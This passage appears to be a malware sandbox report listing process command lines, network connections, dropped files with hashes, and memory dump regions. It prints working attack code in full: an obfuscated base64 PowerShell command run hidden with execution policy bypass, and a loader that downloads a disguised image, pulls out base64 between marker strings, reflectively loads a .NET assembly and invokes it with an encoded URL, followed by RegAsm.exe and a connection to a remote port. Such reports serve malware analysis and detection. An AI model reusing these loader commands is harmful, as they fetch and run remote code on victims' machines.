♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g
♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | paste.ee | udp
US | 188.114.96.0:443 | paste.ee | tcp
US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp
US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | uploaddeimagens.com.br | udp
US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp
US | 8.8.8.8:53 | 198.5.85.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp
US | 66.228.43.8:80 | 66.228.43.8 | tcp
US | 8.8.8.8:53 | 8.43.228.66.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 107.172.31.178:1070 | | tcp
US | 8.8.8.8:53 | 178.31.172.107.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | geoplugin.net | udp
NL | 178.237.33.50:80 | geoplugin.net | tcp
US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp
US | 8.8.8.8:53 | 135.5.85.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 203.78.101.95.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp

Files

memory/3240-0-0x000002937C560000-0x000002937C582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ka45prqq.unx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3240-10-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

memory/3240-12-0x000002937A300000-0x000002937A310000-memory.dmp

memory/3240-11-0x000002937A300000-0x000002937A310000-memory.dmp

memory/4576-13-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

memory/4576-23-0x0000015A438B0000-0x0000015A438C0000-memory.dmp

memory/4576-24-0x0000015A2B6C0000-0x0000015A2B6CA000-memory.dmp

memory/4576-25-0x0000015A2B6D0000-0x0000015A2B6D8000-memory.dmp

memory/744-26-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4576-29-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

memory/3240-34-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

memory/744-33-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-35-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-37-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-38-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-39-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-40-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-41-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-42-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-45-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-46-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-47-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-48-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-51-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-52-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-53-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-54-0x0000000000400000-0x0000000000482000-memory.dmp